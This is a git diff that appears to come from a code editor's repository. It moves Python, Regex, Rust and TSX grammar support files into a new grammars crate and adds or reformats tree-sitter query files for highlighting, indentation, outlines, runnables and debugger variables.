crates/grammars/src/python/config.toml index d96a5ea5fefd0814c4b0787251e5cf6e4c166d5e..0c2072393bf6cc1db6b152d80779cd7c81af1a7e 100644 --- a/crates/languages/src/python/config.toml +++ b/crates/grammars/src/python/config.toml @@ -2,6 +2,7 @@ name = "Python" grammar = "python" path_suffixes = ["py", "pyi", "mpy"] first_line_pattern = '^#!.*((\bpython[0-9.]*\b)|(\buv run\b))' +modeline_aliases = ["py"] line_comments = ["# "] autoclose_before = ";:.,=}])>" brackets = [ @@ -35,4 +36,3 @@ decrease_indent_patterns = [ { pattern = "^\\s*except\\b.*:\\s*(#.*)?", valid_after = ["try", "except"] }, { pattern = "^\\s*finally\\b.*:\\s*(#.*)?", valid_after = ["try", "except", "else"] }, ] -import_path_strip_regex = "/__init__\\.py$" diff --git a/crates/grammars/src/python/debugger.scm b/crates/grammars/src/python/debugger.scm new file mode 100644 index 0000000000000000000000000000000000000000..8c241f8cae0e4c1e2ea39311dd86fda2ba6978dc --- /dev/null +++ b/crates/grammars/src/python/debugger.scm @@ -0,0 +1,97 @@ +(identifier) @debug-variable +(#eq? @debug-variable "self") + +(assignment + left: (identifier) @debug-variable) + +(assignment + left: (pattern_list + (identifier) @debug-variable)) + +(assignment + left: (tuple_pattern + (identifier) @debug-variable)) + +(augmented_assignment + left: (identifier) @debug-variable) + +(for_statement + left: (identifier) @debug-variable) + +(for_statement + left: (pattern_list + (identifier) @debug-variable)) + +(for_statement + left: (tuple_pattern + (identifier) @debug-variable)) + +(for_in_clause + left: (identifier) @debug-variable) + +(for_in_clause + left: (pattern_list + (identifier) @debug-variable)) + +(for_in_clause + left: (tuple_pattern + (identifier) @debug-variable)) + +(as_pattern + (identifier) @debug-variable) + +(binary_operator + left: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(binary_operator + right: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(comparison_operator + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(list + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(tuple + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(set + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(subscript + value: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(attribute + object: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(return_statement + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(parenthesized_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(argument_list + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(if_statement + condition: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(while_statement + condition: (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(block) @debug-scope + +(module) @debug-scope diff --git a/crates/languages/src/python/highlights.scm b/crates/grammars/src/python/highlights.scm similarity index 60% rename from crates/languages/src/python/highlights.scm rename to crates/grammars/src/python/highlights.scm index f15b3a0e2b03d9c913627b319aff9bca6bb8708e..87283aaa799a15ea188f3427b4277e9eaba517c1 100644 --- a/crates/languages/src/python/highlights.scm +++ b/crates/grammars/src/python/highlights.scm @@ -1,6 +1,8 @@ ; Identifier naming conventions; these "soft conventions" should stay at the top of the file as they're often overridden (identifier) @variable -(attribute attribute: (identifier) @property) + +(attribute + attribute: (identifier) @property) ; CamelCase for classes ((identifier) @type.class @@ -10,45 +12,56 @@ ((identifier) @constant (#match? @constant "^_*[A-Z][A-Z0-9_]*$")) -(type (identifier) @type) -(generic_type (identifier) @type) +(type + (identifier) @type) + +(generic_type + (identifier) @type) + (comment) @comment + (string) @string + (escape_sequence) @string.escape ; Type alias -(type_alias_statement "type" @keyword) +(type_alias_statement + "type" @keyword) ; TypeVar with constraints in type parameters (type - (tuple (identifier) @type) -) + (tuple + (identifier) @type)) ; Forward references (type - (string) @type -) - + (string) @type) ; Function calls - (call - function: (attribute attribute: (identifier) @function.method.call)) + function: (attribute + attribute: (identifier) @function.method.call)) + (call function: (identifier) @function.call) -(decorator "@" @punctuation.special) +(decorator + "@" @punctuation.special) + (decorator "@" @punctuation.special [ (identifier) @function.decorator - (attribute attribute: (identifier) @function.decorator) - (call function: (identifier) @function.decorator.call) - (call (attribute attribute: (identifier) @function.decorator.call)) + (attribute + attribute: (identifier) @function.decorator) + (call + function: (identifier) @function.decorator.call) + (call + (attribute + attribute: (identifier) @function.decorator.call)) ]) ; Function and class definitions - (function_definition name: (identifier) @function.definition) @@ -69,15 +82,15 @@ ; Function arguments (function_definition parameters: (parameters - [ - (identifier) @variable.parameter; Simple parameters + [ + (identifier) @variable.parameter ; Simple parameters (typed_parameter (identifier) @variable.parameter) ; Typed parameters (default_parameter name: (identifier) @variable.parameter) ; Default parameters (typed_default_parameter name: (identifier) @variable.parameter) ; Typed default parameters - ])) + ])) ; Keyword arguments (call @@ -86,28 +99,30 @@ name: (identifier) @function.kwargs))) ; Class definitions and calling: needs to come after the regex matching above - (class_definition name: (identifier) @type.class.definition) (class_definition superclasses: (argument_list - (identifier) @type.class.inheritance)) + (identifier) @type.class.inheritance)) (call function: (identifier) @type.class.call (#match? @type.class.call "^_*[A-Z][A-Za-z0-9_]*$")) ; Builtins - ((call function: (identifier) @function.builtin) - (#any-of? - @function.builtin - "abs" "all" "any" "ascii" "bin" "bool" "breakpoint" "bytearray" "bytes" "callable" "chr" "classmethod" "compile" "complex" "delattr" "dict" "dir" "divmod" "enumerate" "eval" "exec" "filter" "float" "format" "frozenset" "getattr" "globals" "hasattr" "hash" "help" "hex" "id" "input" "int" "isinstance" "issubclass" "iter" "len" "list" "locals" "map" "max" "memoryview" "min" "next" "object" "oct" "open" "ord" "pow" "print" "property" "range" "repr" "reversed" "round" "set" "setattr" "slice" "sorted" "staticmethod" "str" "sum" "super" "tuple" "type" "vars" "zip" "__import__")) + (#any-of? @function.builtin + "abs" "all" "any" "ascii" "bin" "bool" "breakpoint" "bytearray" "bytes" "callable" "chr" + "classmethod" "compile" "complex" "delattr" "dict" "dir" "divmod" "enumerate" "eval" "exec" + "filter" "float" "format" "frozenset" "getattr" "globals" "hasattr" "hash" "help" "hex" "id" + "input" "int" "isinstance" "issubclass" "iter" "len" "list" "locals" "map" "max" "memoryview" + "min" "next" "object" "oct" "open" "ord" "pow" "print" "property" "range" "repr" "reversed" + "round" "set" "setattr" "slice" "sorted" "staticmethod" "str" "sum" "super" "tuple" "type" + "vars" "zip" "__import__")) ; Literals - [ (true) (false) @@ -124,10 +139,11 @@ ] @number ; Self references - [ - (parameters (identifier) @variable.special) - (attribute (identifier) @variable.special) + (parameters + (identifier) @variable.special) + (attribute + (identifier) @variable.special) (#any-of? @variable.special "self" "cls") ] @@ -152,37 +168,57 @@ ; Docstrings. ([ - (expression_statement (assignment)) + (expression_statement + (assignment)) (type_alias_statement) ] -. (expression_statement (string) @string.doc)+) + . + (expression_statement + (string) @string.doc)+) (module - .(expression_statement (string) @string.doc)+) + . + (expression_statement + (string) @string.doc)+) (class_definition - body: (block .(expression_statement (string) @string.doc)+)) + body: (block + . + (expression_statement + (string) @string.doc)+)) (function_definition "async"? "def" name: (_) (parameters)? - body: (block .(expression_statement (string) @string.doc)+)) + body: (block + . + (expression_statement + (string) @string.doc)+)) (class_definition body: (block - . (comment) @comment* - . (expression_statement (string) @string.doc)+)) + . + (comment) @comment* + . + (expression_statement + (string) @string.doc)+)) (module - . (comment) @comment* - . (expression_statement (string) @string.doc)+) + . + (comment) @comment* + . + (expression_statement + (string) @string.doc)+) (class_definition body: (block - (expression_statement (assignment)) - . (expression_statement (string) @string.doc)+)) + (expression_statement + (assignment)) + . + (expression_statement + (string) @string.doc)+)) (class_definition body: (block @@ -190,9 +226,11 @@ name: (identifier) @function.method.constructor (#eq? @function.method.constructor "__init__") body: (block - (expression_statement (assignment)) - . (expression_statement (string) @string.doc)+)))) - + (expression_statement + (assignment)) + . + (expression_statement + (string) @string.doc)+)))) [ "-" @@ -286,18 +324,23 @@ "lambda" ] @keyword.definition -(decorator (identifier) @attribute.builtin +(decorator + (identifier) @attribute.builtin (#any-of? @attribute.builtin "classmethod" "staticmethod" "property")) ; Builtin types as identifiers [ (call function: (identifier) @type.builtin) - (type (identifier) @type.builtin) - (generic_type (identifier) @type.builtin) + (type + (identifier) @type.builtin) + (generic_type + (identifier) @type.builtin) ; also check if type binary operator left identifier for union types (type (binary_operator left: (identifier) @type.builtin)) - (#any-of? @type.builtin "bool" "bytearray" "bytes" "complex" "dict" "float" "frozenset" "int" "list" "memoryview" "object" "range" "set" "slice" "str" "tuple") + (#any-of? @type.builtin + "bool" "bytearray" "bytes" "complex" "dict" "float" "frozenset" "int" "list" "memoryview" + "object" "range" "set" "slice" "str" "tuple") ] diff --git a/crates/languages/src/python/indents.scm b/crates/grammars/src/python/indents.scm similarity index 78% rename from crates/languages/src/python/indents.scm rename to crates/grammars/src/python/indents.scm index 3d4c1cc9c4260d4e925cc373662ae5ca3b82e124..9361aa7158725b22e40040e7d730d2693c688c97 100644 --- a/crates/languages/src/python/indents.scm +++ b/crates/grammars/src/python/indents.scm @@ -1,17 +1,37 @@ -(_ "[" "]" @end) @indent -(_ "{" "}" @end) @indent -(_ "(" ")" @end) @indent +(_ + "[" + "]" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent (function_definition) @start.def + (class_definition) @start.class + (if_statement) @start.if + (for_statement) @start.for + (while_statement) @start.while + (with_statement) @start.with + (match_statement) @start.match + (try_statement) @start.try + (elif_clause) @start.elif + (else_clause) @start.else + (except_clause) @start.except + (finally_clause) @start.finally + (case_clause) @start.case diff --git a/crates/languages/src/python/injections.scm b/crates/grammars/src/python/injections.scm similarity index 100% rename from crates/languages/src/python/injections.scm rename to crates/grammars/src/python/injections.scm diff --git a/crates/grammars/src/python/outline.scm b/crates/grammars/src/python/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..c335eef46545fcc0b493e66c780b6ecf839bd791 --- /dev/null +++ b/crates/grammars/src/python/outline.scm @@ -0,0 +1,10 @@ +(decorator) @annotation + +(class_definition + "class" @context + name: (identifier) @name) @item + +(function_definition + "async"? @context + "def" @context + name: (_) @name) @item diff --git a/crates/languages/src/python/overrides.scm b/crates/grammars/src/python/overrides.scm similarity index 97% rename from crates/languages/src/python/overrides.scm rename to crates/grammars/src/python/overrides.scm index 81fec9a5f57b28fc67b4781ec37df43559e21dc9..544e9876f8ea8f1d676ee21731fdcb30fc7163ec 100644 --- a/crates/languages/src/python/overrides.scm +++ b/crates/grammars/src/python/overrides.scm @@ -1,2 +1,3 @@ (comment) @comment.inclusive + (string) @string diff --git a/crates/grammars/src/python/runnables.scm b/crates/grammars/src/python/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..3480d4a81017605da2f7cd473595d339f5d522a8 --- /dev/null +++ b/crates/grammars/src/python/runnables.scm @@ -0,0 +1,108 @@ +; subclasses of unittest.TestCase or TestCase +((class_definition + name: (identifier) @run @_unittest_class_name + superclasses: (argument_list + [ + (identifier) @_superclass + (attribute + (identifier) @_superclass) + ]) + (#eq? @_superclass "TestCase")) @_python-unittest-class + (#set! tag python-unittest-class)) + +; test methods whose names start with `test` in a TestCase +(class_definition + name: (identifier) @_unittest_class_name + superclasses: (argument_list + [ + (identifier) @_superclass + (attribute + (identifier) @_superclass) + ]) + (#eq? @_superclass "TestCase") + body: (block + (function_definition + name: (identifier) @run @_unittest_method_name + (#match? @_unittest_method_name "^test.*")) @_python-unittest-method + (#set! tag python-unittest-method))) + +; pytest functions +((module + (function_definition + name: (identifier) @run @_pytest_method_name + (#match? @_pytest_method_name "^test_")) @_python-pytest-method) + (#set! tag python-pytest-method)) + +; decorated pytest functions +((module + (decorated_definition + (decorator)+ @_decorator + definition: (function_definition + name: (identifier) @run @_pytest_method_name + (#match? @_pytest_method_name "^test_"))) @_python-pytest-method) + (#set! tag python-pytest-method)) + +; pytest classes +(module + (class_definition + name: (identifier) @run @_pytest_class_name + (#match? @_pytest_class_name "^Test")) + (#set! tag python-pytest-class)) + +; decorated pytest classes +(module + (decorated_definition + (decorator)+ @_decorator + definition: (class_definition + name: (identifier) @run @_pytest_class_name + (#match? @_pytest_class_name "^Test"))) + (#set! tag python-pytest-class)) + +; pytest class methods +(module + (class_definition + name: (identifier) @_pytest_class_name + (#match? @_pytest_class_name "^Test") + body: (block + [ + (decorated_definition + (decorator)+ @_decorator + definition: (function_definition + name: (identifier) @run @_pytest_method_name + (#match? @_pytest_method_name "^test_"))) + (function_definition + name: (identifier) @run @_pytest_method_name + (#match? @_pytest_method_name "^test")) + ] @_python-pytest-method) + (#set! tag python-pytest-method))) + +; decorated pytest class methods +(module + (decorated_definition + (decorator)+ @_decorator + definition: (class_definition + name: (identifier) @_pytest_class_name + (#match? @_pytest_class_name "^Test") + body: (block + [ + (decorated_definition + (decorator)+ @_decorator + definition: (function_definition + name: (identifier) @run @_pytest_method_name + (#match? @_pytest_method_name "^test_"))) + (function_definition + name: (identifier) @run @_pytest_method_name + (#match? @_pytest_method_name "^test")) + ] @_python-pytest-method) + (#set! tag python-pytest-method)))) + +; module main method +(module + (if_statement + condition: (comparison_operator + (identifier) @run @_lhs + operators: "==" + (string) @_rhs) + (#eq? @_lhs "__name__") + (#match? @_rhs "^[\"']__main__[\"']$") + (#set! tag python-module-main-method))) diff --git a/crates/grammars/src/python/semantic_token_rules.json b/crates/grammars/src/python/semantic_token_rules.json new file mode 100644 index 0000000000000000000000000000000000000000..b73bae962fe00f1ffde22852d7809d6d8228af63 --- /dev/null +++ b/crates/grammars/src/python/semantic_token_rules.json @@ -0,0 +1,15 @@ +[ + { + "token_type": "selfParameter", + "style": ["variable.special"] + }, + { + "token_type": "clsParameter", + "style": ["variable.special"] + }, + // ty specific + { + "token_type": "builtinConstant", + "style": ["constant.builtin"] + } +] diff --git a/crates/languages/src/python/textobjects.scm b/crates/grammars/src/python/textobjects.scm similarity index 100% rename from crates/languages/src/python/textobjects.scm rename to crates/grammars/src/python/textobjects.scm diff --git a/crates/grammars/src/regex/brackets.scm b/crates/grammars/src/regex/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..3779d8514bdee9fed0abe1f14b98851754decd8c --- /dev/null +++ b/crates/grammars/src/regex/brackets.scm @@ -0,0 +1,8 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) diff --git a/crates/languages/src/regex/config.toml b/crates/grammars/src/regex/config.toml similarity index 100% rename from crates/languages/src/regex/config.toml rename to crates/grammars/src/regex/config.toml diff --git a/crates/languages/src/regex/highlights.scm b/crates/grammars/src/regex/highlights.scm similarity index 93% rename from crates/languages/src/regex/highlights.scm rename to crates/grammars/src/regex/highlights.scm index b5adecf472941154ae84d2acb62fea218859bbea..b0df4b98be08214554dd58a1dcfd1aab0b06586b 100644 --- a/crates/languages/src/regex/highlights.scm +++ b/crates/grammars/src/regex/highlights.scm @@ -51,5 +51,6 @@ (character_class [ "^" @operator.regex - (class_range "-" @operator.regex) + (class_range + "-" @operator.regex) ]) diff --git a/crates/grammars/src/rust/brackets.scm b/crates/grammars/src/rust/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..9d78bb11116a0cbff542c721596ec6f8fc92d0cb --- /dev/null +++ b/crates/grammars/src/rust/brackets.scm @@ -0,0 +1,23 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +("<" @open + ">" @close) + +(closure_parameters + "|" @open + "|" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/rust/config.toml b/crates/grammars/src/rust/config.toml similarity index 92% rename from crates/languages/src/rust/config.toml rename to crates/grammars/src/rust/config.toml index 826a219e9868a3f76a063efe8c91cec0be14c2da..f739b370f4b5c3fe7bc53f4818ffabedfa1bbd0b 100644 --- a/crates/languages/src/rust/config.toml +++ b/crates/grammars/src/rust/config.toml @@ -1,6 +1,7 @@ name = "Rust" grammar = "rust" path_suffixes = ["rs"] +modeline_aliases = ["rs", "rustic"] line_comments = ["// ", "/// ", "//! "] autoclose_before = ";:.,=}])>" brackets = [ @@ -17,5 +18,3 @@ brackets = [ collapsed_placeholder = " /* ... */ " debuggers = ["CodeLLDB", "GDB"] documentation_comment = { start = "/*", prefix = "* ", end = "*/", tab_size = 1 } -ignored_import_segments = ["crate", "super"] -import_path_strip_regex = "/(lib|mod)\\.rs$" diff --git a/crates/grammars/src/rust/debugger.scm b/crates/grammars/src/rust/debugger.scm new file mode 100644 index 0000000000000000000000000000000000000000..3c7195796feb41a771ec8071d78bea60efb61fd9 --- /dev/null +++ b/crates/grammars/src/rust/debugger.scm @@ -0,0 +1,85 @@ +(metavariable) @debug-variable + +(parameter + (identifier) @debug-variable) + +(self) @debug-variable + +(static_item + (identifier) @debug-variable) + +(const_item + (identifier) @debug-variable) + +(let_declaration + pattern: (identifier) @debug-variable) + +(let_condition + (identifier) @debug-variable) + +(match_arm + (identifier) @debug-variable) + +(for_expression + (identifier) @debug-variable) + +(closure_parameters + (identifier) @debug-variable) + +(assignment_expression + (identifier) @debug-variable) + +(field_expression + (identifier) @debug-variable) + +(binary_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(reference_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(array_expression + (identifier) @debug-variable) + +(tuple_expression + (identifier) @debug-variable) + +(return_expression + (identifier) @debug-variable) + +(await_expression + (identifier) @debug-variable) + +(try_expression + (identifier) @debug-variable) + +(index_expression + (identifier) @debug-variable) + +(range_expression + (identifier) @debug-variable) + +(unary_expression + (identifier) @debug-variable) + +(if_expression + (identifier) @debug-variable) + +(while_expression + (identifier) @debug-variable) + +(parenthesized_expression + (identifier) @debug-variable) + +(arguments + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(macro_invocation + (token_tree + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]"))) + +(block) @debug-scope diff --git a/crates/languages/src/rust/highlights.scm b/crates/grammars/src/rust/highlights.scm similarity index 63% rename from crates/languages/src/rust/highlights.scm rename to crates/grammars/src/rust/highlights.scm index 82008d701536177cbe7cab8d6fc6c82e0568e944..57e5ed3f704dcd70974b73e0a0d4e31253191048 100644 --- a/crates/languages/src/rust/highlights.scm +++ b/crates/grammars/src/rust/highlights.scm @@ -1,17 +1,33 @@ (identifier) @variable + (metavariable) @variable + (type_identifier) @type + (fragment_specifier) @type + (primitive_type) @type.builtin + (self) @variable.special + (field_identifier) @property + (shorthand_field_identifier) @property -(trait_item name: (type_identifier) @type.interface) -(impl_item trait: (type_identifier) @type.interface) -(abstract_type trait: (type_identifier) @type.interface) -(dynamic_type trait: (type_identifier) @type.interface) -(trait_bounds (type_identifier) @type.interface) +(trait_item + name: (type_identifier) @type.interface) + +(impl_item + trait: (type_identifier) @type.interface) + +(abstract_type + trait: (type_identifier) @type.interface) + +(dynamic_type + trait: (type_identifier) @type.interface) + +(trait_bounds + (type_identifier) @type.interface) (call_expression function: [ @@ -31,8 +47,11 @@ field: (field_identifier) @function.method) ]) -(function_item name: (identifier) @function.definition) -(function_signature_item name: (identifier) @function.definition) +(function_item + name: (identifier) @function.definition) + +(function_signature_item + name: (identifier) @function.definition) (macro_invocation macro: [ @@ -48,17 +67,17 @@ name: (identifier) @function.special.definition) ; Identifier conventions - ; Assume uppercase names are types/enum-constructors ((identifier) @type - (#match? @type "^[A-Z]")) + (#match? @type "^[A-Z]")) ; Assume all-caps names are constants ((identifier) @constant - (#match? @constant "^_*[A-Z][A-Z\\d_]*$")) + (#match? @constant "^_*[A-Z][A-Z\\d_]*$")) ; Ensure enum variants are highlighted correctly regardless of naming convention -(enum_variant name: (identifier) @type) +(enum_variant + name: (identifier) @type) [ "(" @@ -81,9 +100,7 @@ "::" ] @punctuation.delimiter -[ - "#" -] @punctuation.special +"#" @punctuation.special [ "as" @@ -131,7 +148,7 @@ ] @keyword.control (for_expression - ("for" @keyword.control)) + "for" @keyword.control) [ (string_literal) @@ -154,8 +171,10 @@ ] @comment [ - (line_comment (doc_comment)) - (block_comment (doc_comment)) + (line_comment + (doc_comment)) + (block_comment + (doc_comment)) ] @comment.doc [ @@ -198,25 +217,44 @@ ] @operator ; Avoid highlighting these as operators when used in doc comments. -(unary_expression "!" @operator) +(unary_expression + "!" @operator) + operator: "/" @operator (lifetime "'" @lifetime (identifier) @lifetime) -(parameter (identifier) @variable.parameter) - -(attribute_item (attribute [ - (identifier) @attribute - (scoped_identifier name: (identifier) @attribute) - (token_tree (identifier) @attribute (#match? @attribute "^[a-z\\d_]*$")) - (token_tree (identifier) @none "::" (#match? @none "^[a-z\\d_]*$")) -])) - -(inner_attribute_item (attribute [ - (identifier) @attribute - (scoped_identifier name: (identifier) @attribute) - (token_tree (identifier) @attribute (#match? @attribute "^[a-z\\d_]*$")) - (token_tree (identifier) @none "::" (#match? @none "^[a-z\\d_]*$")) -])) +(parameter + (identifier) @variable.parameter) + +(attribute_item + (attribute + [ + (identifier) @attribute + (scoped_identifier + name: (identifier) @attribute) + (token_tree + (identifier) @attribute + (#match? @attribute "^[a-z\\d_]*$")) + (token_tree + (identifier) @none + "::" + (#match? @none "^[a-z\\d_]*$")) + ])) + +(inner_attribute_item + (attribute + [ + (identifier) @attribute + (scoped_identifier + name: (identifier) @attribute) + (token_tree + (identifier) @attribute + (#match? @attribute "^[a-z\\d_]*$")) + (token_tree + (identifier) @none + "::" + (#match? @none "^[a-z\\d_]*$")) + ])) diff --git a/crates/grammars/src/rust/indents.scm b/crates/grammars/src/rust/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..b4ef2ebcd78016de1092e718385ab52a89273003 --- /dev/null +++ b/crates/grammars/src/rust/indents.scm @@ -0,0 +1,26 @@ +[ + ((where_clause) + _ @end) + (field_expression) + (call_expression) + (assignment_expression) + (let_declaration) + (let_chain) + (await_expression) +] @indent + +(_ + "[" + "]" @end) @indent + +(_ + "<" + ">" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent diff --git a/crates/grammars/src/rust/injections.scm b/crates/grammars/src/rust/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..89d839282d3388f450f9ebdb923167f0986f349c --- /dev/null +++ b/crates/grammars/src/rust/injections.scm @@ -0,0 +1,67 @@ +([ + (line_comment) + (block_comment) +] @injection.content + (#set! injection.language "comment")) + +(macro_invocation + macro: [ + (identifier) @_macro_name + (scoped_identifier + (identifier) @_macro_name .) + ] + (#not-any-of? @_macro_name "view" "html") + (token_tree) @injection.content + (#set! injection.language "rust")) + +; we need a better way for the leptos extension to declare that +; it wants to inject inside of rust, instead of modifying the rust +; injections to support leptos injections +(macro_invocation + macro: [ + (identifier) @_macro_name + (scoped_identifier + (identifier) @_macro_name .) + ] + (#any-of? @_macro_name "view" "html") + (token_tree) @injection.content + (#set! injection.language "rstml")) + +(macro_invocation + macro: [ + (identifier) @_macro_name + (scoped_identifier + (identifier) @_macro_name .) + ] + (#any-of? @_macro_name "sql") + (_) @injection.content + (#set! injection.language "sql")) + +; lazy_regex +(macro_invocation + macro: [ + (identifier) @_macro_name + (scoped_identifier + (identifier) @_macro_name .) + ] + (token_tree + [ + (string_literal + (string_content) @injection.content) + (raw_string_literal + (string_content) @injection.content) + ]) + (#set! injection.language "regex") + (#any-of? @_macro_name "regex" "bytes_regex")) + +(call_expression + function: (scoped_identifier) @_fn_path + arguments: (arguments + [ + (string_literal + (string_content) @injection.content) + (raw_string_literal + (string_content) @injection.content) + ]) + (#match? @_fn_path ".*Regex(Builder)?::new") + (#set! injection.language "regex")) diff --git a/crates/grammars/src/rust/outline.scm b/crates/grammars/src/rust/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..03ecb99facdc99cb0be8e2fb6bd4e177cb936b4e --- /dev/null +++ b/crates/grammars/src/rust/outline.scm @@ -0,0 +1,81 @@ +(attribute_item) @annotation + +(line_comment) @annotation + +(struct_item + (visibility_modifier)? @context + "struct" @context + name: (_) @name) @item + +(enum_item + (visibility_modifier)? @context + "enum" @context + name: (_) @name) @item + +(enum_variant + (visibility_modifier)? @context + name: (_) @name) @item + +(impl_item + "impl" @context + trait: (_)? @name + "for"? @context + type: (_) @name + body: (_ + . + "{" @open + "}" @close .)) @item + +(trait_item + (visibility_modifier)? @context + "trait" @context + name: (_) @name) @item + +(function_item + (visibility_modifier)? @context + (function_modifiers)? @context + "fn" @context + name: (_) @name + body: (_ + . + "{" @open + "}" @close .)) @item + +(function_signature_item + (visibility_modifier)? @context + (function_modifiers)? @context + "fn" @context + name: (_) @name) @item + +(macro_definition + . + "macro_rules!" @context + name: (_) @name) @item + +(mod_item + (visibility_modifier)? @context + "mod" @context + name: (_) @name) @item + +(type_item + (visibility_modifier)? @context + "type" @context + name: (_) @name) @item + +(associated_type + "type" @context + name: (_) @name) @item + +(const_item + (visibility_modifier)? @context + "const" @context + name: (_) @name) @item + +(static_item + (visibility_modifier)? @context + "static" @context + name: (_) @name) @item + +(field_declaration + (visibility_modifier)? @context + name: (_) @name) @item diff --git a/crates/languages/src/rust/overrides.scm b/crates/grammars/src/rust/overrides.scm similarity index 99% rename from crates/languages/src/rust/overrides.scm rename to crates/grammars/src/rust/overrides.scm index 91fa6139d387db97676cd32a84433b16f3c8e94e..039425a91d519b2b4b030a37ad9e71705833820e 100644 --- a/crates/languages/src/rust/overrides.scm +++ b/crates/grammars/src/rust/overrides.scm @@ -2,6 +2,7 @@ (string_literal) (raw_string_literal) ] @string + [ (line_comment) (block_comment) diff --git a/crates/grammars/src/rust/runnables.scm b/crates/grammars/src/rust/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..ef7050397df586ebb96c2648ea3be282d246e5aa --- /dev/null +++ b/crates/grammars/src/rust/runnables.scm @@ -0,0 +1,75 @@ +; Rust mod test +((attribute_item + (attribute + (identifier) @_attribute + arguments: ((token_tree + (identifier) @_test) + (#eq? @_test "test"))) + (#eq? @_attribute "cfg")) + . + (mod_item + name: (_) @run) + (#set! tag rust-mod-test)) + +; Rust test +(((attribute_item + (attribute + [ + (identifier) @_attribute + (scoped_identifier + (identifier) @_attribute) + ]) + (#match? @_attribute "test")) @_start + . + (attribute_item)* + . + [ + (line_comment) + (block_comment) + ]* + . + (function_item + name: (_) @run @_test_name + body: _) @_end) + (#set! tag rust-test)) + +; Rust doc test +(((line_comment)* + (line_comment + doc: (_) @_comment_content) @_start @run + (#match? @_comment_content "```") + . + (line_comment)* + . + (line_comment + doc: (_) @_end_comment_content) @_end_code_block + (#match? @_end_comment_content "```") + . + (line_comment)* + (attribute_item)* + . + [ + (function_item + name: (_) @_doc_test_name + body: _) + (function_signature_item + name: (_) @_doc_test_name) + (struct_item + name: (_) @_doc_test_name) + (enum_item + name: (_) @_doc_test_name + body: _) + ((attribute_item)? + (macro_definition + name: (_) @_doc_test_name)) + (mod_item + name: (_) @_doc_test_name) + ] @_end) + (#set! tag rust-doc-test)) + +; Rust main function +(((function_item + name: (_) @run + body: _) @_rust_main_function_end + (#eq? @run "main")) + (#set! tag rust-main)) diff --git a/crates/languages/src/rust/semantic_token_rules.json b/crates/grammars/src/rust/semantic_token_rules.json similarity index 100% rename from crates/languages/src/rust/semantic_token_rules.json rename to crates/grammars/src/rust/semantic_token_rules.json diff --git a/crates/grammars/src/rust/textobjects.scm b/crates/grammars/src/rust/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..97a90a54f800942eb733a9bd494b6e56e191a3ec --- /dev/null +++ b/crates/grammars/src/rust/textobjects.scm @@ -0,0 +1,74 @@ +; functions +(function_signature_item) @function.around + +(function_item + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +; classes +(struct_item + body: (_ + [ + "{" + "(" + ]? + [ + (_) + ","? + ]* @class.inside + [ + "}" + ")" + ]?)) @class.around + +(enum_item + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(union_item + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(trait_item + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(impl_item + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(mod_item + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +; comments +(line_comment)+ @comment.around + +(block_comment) @comment.around diff --git a/crates/grammars/src/tsx/brackets.scm b/crates/grammars/src/tsx/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..cd59d553783f685775e45ba883210272b168c3b8 --- /dev/null +++ b/crates/grammars/src/tsx/brackets.scm @@ -0,0 +1,38 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("<" @open + ">" @close) + (#set! rainbow.exclude)) + +(("<" @open + "/>" @close) + (#set! rainbow.exclude)) + +(("" @close) + (#set! rainbow.exclude)) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) + +(("`" @open + "`" @close) + (#set! rainbow.exclude)) + +((jsx_element + (jsx_opening_element) @open + (jsx_closing_element) @close) + (#set! newline.only) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/tsx/config.toml b/crates/grammars/src/tsx/config.toml similarity index 98% rename from crates/languages/src/tsx/config.toml rename to crates/grammars/src/tsx/config.toml index d0a4eb6532db621d741df2fbc99125e1c037ccdf..42438fdf890a98f319244332f384f574e02c2904 100644 --- a/crates/languages/src/tsx/config.toml +++ b/crates/grammars/src/tsx/config.toml @@ 